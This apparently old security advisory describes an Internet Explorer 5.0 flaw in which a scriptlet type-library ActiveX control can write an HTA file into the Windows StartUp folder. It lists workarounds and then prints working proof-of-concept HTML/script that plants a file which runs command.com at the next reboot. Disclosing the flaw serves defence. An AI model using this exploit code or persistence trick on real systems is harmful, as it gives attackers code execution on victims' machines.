Internet Explorer 5.0 under Windows 95/98 (don't know about NT) allows executing arbitrary programs on the local machine by creating and overwriting local files and putting content in them.

Details:

The problem is the ActiveX Control "Object for constructing type libraries for scriptlets".
There is some unneeded information in the file, but part of the content may be chosen.
So, an HTML Application file may be created, fed with exploit information and written to the StartUp folder.
The next time the user reboots (which may be forced), the code in the HTML Application file will be executed.
This vulnerability can be exploited via email.

Workaround:
Disable Active Scripting
or
Disable Run ActiveX Controls and plug-ins
Go to
Control Panel -- Internet Options
and click the 'Security' tab. Click 'Internet' and then the 'Custom level' button on the bottom.

Personal note:
Java has security problems too; also, banner ad companies have started to download Java programs to your hard disk, so you'll never miss an advertisement. That, plus the fact that Java causes Windows to crash on all of my Pentium computers, has made me disable it. Java is supposed to run in what they call a 'sandbox,' which should be safe, but exploits have already been written and are circulating.

The code is:

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\krkosska.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('You have been infected by kevin! etc. ');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

Delete the file 'krkosska.hta' from your C:\WINDOWS\Start Menu\Programs\StartUp folder after you're done.